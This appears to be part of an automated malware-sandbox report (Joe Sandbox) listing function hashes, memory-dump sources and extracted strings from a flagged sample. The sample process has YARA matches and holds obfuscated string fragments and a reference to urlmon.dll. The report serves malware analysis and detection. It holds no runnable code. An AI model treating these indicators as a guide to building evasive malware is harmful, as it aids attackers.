                                                      • Instruction Fuzzy Hash: E7E1F030624742AFDB26CF28D984B6AB7E0BF84754F184A5DF4A58B2D0D7B4D8C4CB42
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032B7B7F
                                                      • RTL: Resource at %p, xrefs: 032B7B8E
                                                      • RTL: Re-Waiting, xrefs: 032B7BAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 2460ae1e6e868f6d6b333e7cae71f866b4f0fd7f030622e8016bb62dcb3fbf82
                                                      • Instruction ID: a1866ca405cb287f978900a89aeb5a091b58958174c40ed0a9f9d3ef9794d7f5
                                                      • Opcode Fuzzy Hash: 2460ae1e6e868f6d6b333e7cae71f866b4f0fd7f030622e8016bb62dcb3fbf82
                                                      • Instruction Fuzzy Hash: BC41E3353257039FD724DE29C840B6AB7E5FF89B10F040A1DF856DB680DB71E5868B92
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032B728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032B7294
                                                      • RTL: Resource at %p, xrefs: 032B72A3
                                                      • RTL: Re-Waiting, xrefs: 032B72C1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 35b49382d2d48ef34dccaa65692eb74c12fb86f860c0b720de37c609722d85d0
                                                      • Instruction ID: 5e38367d0a40afb82c76fbe0e3bbe3a1c6cd39a34f7f220a983aad3080b2724f
                                                      • Opcode Fuzzy Hash: 35b49382d2d48ef34dccaa65692eb74c12fb86f860c0b720de37c609722d85d0
                                                      • Instruction Fuzzy Hash: 0541FF35620306AFC720DE29CC51BAAB7B5FF85750F180619F995AB280DB71E882CBD1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 9ad985296a8d9e21105cbeb3e20ae205300b10d305833656842915150652a96a
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: E191A371E2221B9BDB24EF6EC8806BEB7A5BF54320F78455AE865E72C0D77099C0C750
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 864cc04372717419556babe0bbc7772b4bed2b26db3599ea2f650ae3f1473dac
                                                      • Instruction ID: 314e647df269fc32efad082a39f0667ee10e228d7c7844168acab1d5e6a93529
                                                      • Opcode Fuzzy Hash: 864cc04372717419556babe0bbc7772b4bed2b26db3599ea2f650ae3f1473dac
                                                      • Instruction Fuzzy Hash: 8E812775D10269DBDB25DB58CC45BEEB7B8AF08710F0445EAE909B7280D7709EC48FA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 032CCFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Cw@4Cw
                                                      • API String ID: 4062629308-3101775584
                                                      • Opcode ID: b321fffa1ac53c2045a31e5eb4025755e5961c178ea02ea1a6ebbb339f204fda
                                                      • Instruction ID: b6eb3d0045e1b87a830fd23a1e1b96db44f171574636e73969a47facaa0ce0ef
                                                      • Opcode Fuzzy Hash: b321fffa1ac53c2045a31e5eb4025755e5961c178ea02ea1a6ebbb339f204fda
                                                      • Instruction Fuzzy Hash: EC419E75920264DFCB21EF99C880AADBBB8EF45710F04812EE915DB254E774D981CB64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "X$&$({$2$8$9$>$D$F&$H$L$Ow$S$V$^'$bP$bP$dx$e$h$p$r$rH$t$yF$&$nF&
                                                      • API String ID: 0-421024270
                                                      • Opcode ID: ea99d9cd7aaf29323a5816fe0136181ba13952521006f261882816f9d3297f99
                                                      • Instruction ID: 900da58950b38697c990770f6ce9120145a9bfafc2f045a19ebc29bc5d87460c
                                                      • Opcode Fuzzy Hash: ea99d9cd7aaf29323a5816fe0136181ba13952521006f261882816f9d3297f99
                                                      • Instruction Fuzzy Hash: 4D32D4B0E49228CFEB24CF94C8987DDBBB1BF85308F2085D9D5496B281D7B91A85CF54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: 38c2afc8b4ba18bd71e58f1857e7723d1dd965d065e7af465094ee83d9128723
                                                      • Instruction ID: f9f449f4e0ec9674a4e2ba1d162ebd244f5d6e2379da4bb468bc22a047a97d25
                                                      • Opcode Fuzzy Hash: 38c2afc8b4ba18bd71e58f1857e7723d1dd965d065e7af465094ee83d9128723
                                                      • Instruction Fuzzy Hash: A75173B6D02218ABDB10EF94DC88FFFB3B8EF85711F044199ED096A144E7719A44DBA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3A
                                                      • API String ID: 0-3026781897
                                                      • Opcode ID: 42e2edea9b2bc1e19105b8ad716b7b90e82e6435dbf531fdd7578918b50a9156
                                                      • Instruction ID: 435c21bc778984ad1676341146e8678d6b4d5af31c6a4c33fcaba62f64e336d2
                                                      • Opcode Fuzzy Hash: 42e2edea9b2bc1e19105b8ad716b7b90e82e6435dbf531fdd7578918b50a9156
                                                      • Instruction Fuzzy Hash: 291100F6D01219AF9B00DFA9D8409EFB7F9FF89210F14466AE919E7204E7705A44CBE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q
                                                      • API String ID: 0-744326856
                                                      • Opcode ID: 0095c3581501c68129c3b321927eea5e73ccf893038690e6cdc1ccadd46c4b2c
                                                      • Instruction ID: f5c3fc87774f008daa9fef8428f54ea23365ec8b4e05190678b5bc70a587245a
                                                      • Opcode Fuzzy Hash: 0095c3581501c68129c3b321927eea5e73ccf893038690e6cdc1ccadd46c4b2c
                                                      • Instruction Fuzzy Hash: 001112F6D01219AF8B00DFA9DC409EFB7F9EF88210F04416AED15E7200E7705A058BA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H
                                                      • API String ID: 0-2852464175
                                                      • Opcode ID: 1ae9e099def784d2620595bac4991d57023cbf7cc31a62ff4d430257d2115b9d
                                                      • Instruction ID: 2ced698f0c28d555ae646112b81f2f832ebee981b8a644f6342bbfb52332a08c
                                                      • Opcode Fuzzy Hash: 1ae9e099def784d2620595bac4991d57023cbf7cc31a62ff4d430257d2115b9d
                                                      • Instruction Fuzzy Hash: B8F08BB76012172BD310DB6DFC80BC6F79CEB82230F285272F81C86241DA329451C3A0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac4830b07f7d15407831c9fe36fcfa597786e8b7dd1f2a17544afdfddd1822ce
                                                      • Instruction ID: 88b6e3353259451d06066c68c541f69cff00520a0963d828ef5afdd361344567
                                                      • Opcode Fuzzy Hash: ac4830b07f7d15407831c9fe36fcfa597786e8b7dd1f2a17544afdfddd1822ce
                                                      • Instruction Fuzzy Hash: CD412CB5D11218AFDB14CF99D881AEEBBBCFF48710F10415AFA05E7240E3B19A40CBA0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae72c489c5717bccabc6da5eb12cda08f84e653dfa231e4deb9adac7e887f91e
                                                      • Instruction ID: b179db7dfabcda627bbf4d1c0f615745317ffe12505ea4e2d7cb1394e92a30dc
                                                      • Opcode Fuzzy Hash: ae72c489c5717bccabc6da5eb12cda08f84e653dfa231e4deb9adac7e887f91e
                                                      • Instruction Fuzzy Hash: 2231C3B5A01648ABDB14DF99C880EEFB7F9EF8C314F108219F919A7244D774A951CFA0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ad1df8651c49f7401c92f58114562d3a305270f5e67b0f9cd990398f77e92a5
                                                      • Instruction ID: e571f2706aca13161f492b4d8a756fb2259b76e223a09d3aabed64016b97401b
                                                      • Opcode Fuzzy Hash: 2ad1df8651c49f7401c92f58114562d3a305270f5e67b0f9cd990398f77e92a5
                                                      • Instruction Fuzzy Hash: F13118B5A11608ABCB14DF99CC40EEFB7F9EF88310F108219F919AB244D770A911CFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 238dd940cc5398550877d7b4f60f7cefbbc44f42470f77686ac65d7ed48c601b
                                                      • Instruction ID: e945f2505ed7dc066cf4017f501f76e55214f66cb9242a6e29e3fb92a0e0d7c1
                                                      • Opcode Fuzzy Hash: 238dd940cc5398550877d7b4f60f7cefbbc44f42470f77686ac65d7ed48c601b
                                                      • Instruction Fuzzy Hash: 7C211BB5A01608ABDB14DF98CC41EEFB7A9EF89710F10411DF919AB244D770A911CFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76eff47cfcf18d142b6c59cdc6140b82e86986bfab2efb456ba7b833541f46a4
                                                      • Instruction ID: f3a9bbe53f797ecd0ecfc6de8a6e764bf4a81d2a8de28ffa9406f5d63e1e1128
                                                      • Opcode Fuzzy Hash: 76eff47cfcf18d142b6c59cdc6140b82e86986bfab2efb456ba7b833541f46a4
                                                      • Instruction Fuzzy Hash: BA1170B63813057BF720EE598C42FAB779DDBC5B20F244019FF08AE2C5D6A5B81146B8
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cd269812d49c86bc0e4e75d8c13139bb0cc073a6f00470d8bc4dedfd56dcf09
                                                      • Instruction ID: 724af7eff34f13d53d191cdfe545a3aa18a3109311db8a9c2b3b660a9d5aa281
                                                      • Opcode Fuzzy Hash: 1cd269812d49c86bc0e4e75d8c13139bb0cc073a6f00470d8bc4dedfd56dcf09
                                                      • Instruction Fuzzy Hash: 9C118EB55017086BD720EBA8CC41FEFB7ACEF85710F10464DF915AB284D7706A018FA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 616eedbefc395ecccad0d04f401d78f82f7edca25e8a4b455c517317d22d5534
                                                      • Instruction ID: f60cedf16c4ca9e8fd44a3e07acda9c815436ff61efa0eb273d84b143e1f7701
                                                      • Opcode Fuzzy Hash: 616eedbefc395ecccad0d04f401d78f82f7edca25e8a4b455c517317d22d5534
                                                      • Instruction Fuzzy Hash: 70116075601708ABD720EBA8CC45FEFB7ACEB85710F10455DF919AB284E7746A01CFA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d10fdb7d3360ac84cc051afa215e377ea3dad21cc232bff562fc1b055a59171b
                                                      • Instruction ID: ebd58dd9b6d5aae1ba2d8653b580bf4588c04a67edc0a29d2c0a396e1aa00076
                                                      • Opcode Fuzzy Hash: d10fdb7d3360ac84cc051afa215e377ea3dad21cc232bff562fc1b055a59171b
                                                      • Instruction Fuzzy Hash: 79118C7F2461415FD711DA789C833C4ABA8EF62624F6824E6D980CF793D21681078A10
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cce3d388c8d416e2bf09e179881ad609b8d8886d9b06ef5712441dc407d2a722
                                                      • Instruction ID: d0d32eda4349f42a3b92fde2be0bfd1d5ccae0bfd360cd89158d389542c54f0e
                                                      • Opcode Fuzzy Hash: cce3d388c8d416e2bf09e179881ad609b8d8886d9b06ef5712441dc407d2a722
                                                      • Instruction Fuzzy Hash: 7D0196B6215508BBCB54DE99DC81EEB77AEEF8C754F408208FA09E7245D630F8518BA4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69079771abbbb9079371fdf323832dfad94cd3815e3710167780dd6fb980b4d6
                                                      • Instruction ID: 27c7f54544f91af28627301fdfb75b0bdc443fff4f741b656ac53d5f2eb43eaa
                                                      • Opcode Fuzzy Hash: 69079771abbbb9079371fdf323832dfad94cd3815e3710167780dd6fb980b4d6
                                                      • Instruction Fuzzy Hash: 5F01C5F6D02219AE8F40DFE8C841AEEBBF8AA48600F14416AD919F7200F7705A548BA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0fe8e4c30c869aa56e700f8882f2bf8365da97a08ae135b74a1e1747cdc7ad23
                                                      • Instruction ID: 5a3e9ef2e1bb5023a0c3ab7f8bdfc0c42d565a185e1a6326790af83d0d5e5ecf
                                                      • Opcode Fuzzy Hash: 0fe8e4c30c869aa56e700f8882f2bf8365da97a08ae135b74a1e1747cdc7ad23
                                                      • Instruction Fuzzy Hash: BDF09675D1574C6AEB10EBA4DC45FFFB379EFC5311F000688E8086B140E77059858B96
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c54a7e5c8e2c9b385e3b7020ba5c12f670c81455ad90c60c471197b3786c938a
                                                      • Instruction ID: 5dfd05d7599a1e26c2ad902ec016fdf27159d41eca90430f8619b5810c9b4e01
                                                      • Opcode Fuzzy Hash: c54a7e5c8e2c9b385e3b7020ba5c12f670c81455ad90c60c471197b3786c938a
                                                      • Instruction Fuzzy Hash: C6F01CBA2002097BCB10EF99DC81EEB77ADEFC9710F004019BA18AB245D770B9118BB0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd380f69e25ad44fda708c3020d554de72344ff8262616012a92947c5b8ee787
                                                      • Instruction ID: 50f5ddf17682866b31b32fb63cf17c917b032812215f0fc26ed22770173f6982
                                                      • Opcode Fuzzy Hash: fd380f69e25ad44fda708c3020d554de72344ff8262616012a92947c5b8ee787
                                                      • Instruction Fuzzy Hash: 17F0827581620CEBDB14CF64D841BDEBBB8EB44720F2047A9E8249B280D63497509781
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 242cc347b1d4e26beb6f4c6ed2bcd6ae15dc4846549bfd8d45fe707bd8143e29
                                                      • Instruction ID: 3e6808d1c482333077cb162c57cd33f667dfc6697e9a92eeb95dfc08cc3bc2ad
                                                      • Opcode Fuzzy Hash: 242cc347b1d4e26beb6f4c6ed2bcd6ae15dc4846549bfd8d45fe707bd8143e29
                                                      • Instruction Fuzzy Hash: CEE06D7A204308BBD610EE98DC41EEB73ADEFC9710F004019FA08AB240D630B910CBB4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82851b538c44eda2d96a9ff665d0b97dcc2c3792c7161e205ea856828cb7ed7b
                                                      • Instruction ID: cd71ecbd99b9769c45a17b73058c851fca789f1e80ff6a21ed83d7a30cbefa3f
                                                      • Opcode Fuzzy Hash: 82851b538c44eda2d96a9ff665d0b97dcc2c3792c7161e205ea856828cb7ed7b
                                                      • Instruction Fuzzy Hash: 12E0867774231477C620A68D9D05FEBB7ACDBD5E70F090068FE08AB345E565A90182F5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4efe6a8131fdab9e9182e4ab698362e2105a6b9133d16f6368658dc3d6bf2f6c
                                                      • Instruction ID: e5ae078a1059ad13ee669c129fd6b32279ada421bd1c21ecb58607f41cd82b71
                                                      • Opcode Fuzzy Hash: 4efe6a8131fdab9e9182e4ab698362e2105a6b9133d16f6368658dc3d6bf2f6c
                                                      • Instruction Fuzzy Hash: FAE06D7581610CABDB08DF64E881AAFBBA8DB04620F2087A9FC18DB280E6359B509755
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e08d3e2e3f9d23949a1a784393d26bd902ca173e8066a41c5b8cbd502fa07426
                                                      • Instruction ID: ca70dc5b1d01d6015a8d2f68c0b09eb28166820d019cf0251237b627d0c2a219
                                                      • Opcode Fuzzy Hash: e08d3e2e3f9d23949a1a784393d26bd902ca173e8066a41c5b8cbd502fa07426
                                                      • Instruction Fuzzy Hash: 76E086362403187BD620EB59CC41FDB779CDFC5710F014025FB186B140C670B90187B0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd7f2a2d4cc3600edef65c3b259cc06c7b7980e88b756cbad5ea2d9810d65ace
                                                      • Instruction ID: 16a3bed6c05f93250d789ae802d81a1b472ef4860238251da5e97edc5ae0ecde
                                                      • Opcode Fuzzy Hash: bd7f2a2d4cc3600edef65c3b259cc06c7b7980e88b756cbad5ea2d9810d65ace
                                                      • Instruction Fuzzy Hash: 36B0127380170C4BCB00FE8043050897B13E9CE3173410196A0021F024C3B63E10C95D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                      • API String ID: 0-3248090998
                                                      • Opcode ID: b70bdedc649d6cb97be6f6d9e346ce2839bffeae30c038cdd7440ea3f7c72cb6
                                                      • Instruction ID: 5a8b8c9399a41c89f6824244acdc8b269281d056b8f3a9c2e5507156d0779bc7
                                                      • Opcode Fuzzy Hash: b70bdedc649d6cb97be6f6d9e346ce2839bffeae30c038cdd7440ea3f7c72cb6
                                                      • Instruction Fuzzy Hash: 3C91FEF08052A98ACB118F55A5603DFBF71BB95204F1581E9D6AA7B203C3BE4E85DF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                      • API String ID: 0-1002149817
                                                      • Opcode ID: a3416413394c4ff56688109535b6684c9fa9b6a682ce08a45da7d92e9dd6303e
                                                      • Instruction ID: 2151189eb1976d89d5a34599520db32a28d4f668b05df5b471348ad24ccf6750
                                                      • Opcode Fuzzy Hash: a3416413394c4ff56688109535b6684c9fa9b6a682ce08a45da7d92e9dd6303e
                                                      • Instruction Fuzzy Hash: 1DC12DB5D01328AADB60DFA5CD44BEEBBB9AF45304F0081D9D50CBB245E7B54A88CF61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "X$&$({$2$8$9$>$D$F&$H$L$Ow$S$V$^'$bP$dx$h$p$r$rH$t$yF$&$n
                                                      • API String ID: 0-3191956575
                                                      • Opcode ID: 36c21736e29073a109902519d001d3c6c3b20f6e79f635fb69671717a5890bb1
                                                      • Instruction ID: f906bf0af439c20926c878bb51cb207d0d2e93e25c96b4598cb1515dbc7d8a17
                                                      • Opcode Fuzzy Hash: 36c21736e29073a109902519d001d3c6c3b20f6e79f635fb69671717a5890bb1
                                                      • Instruction Fuzzy Hash: B59149B0D05268CBEB64CF55C9987CDBBB1BB05308F5085D9C14C7B290DBBA1A89CF95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2df0000_QEwzeZKCXN.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
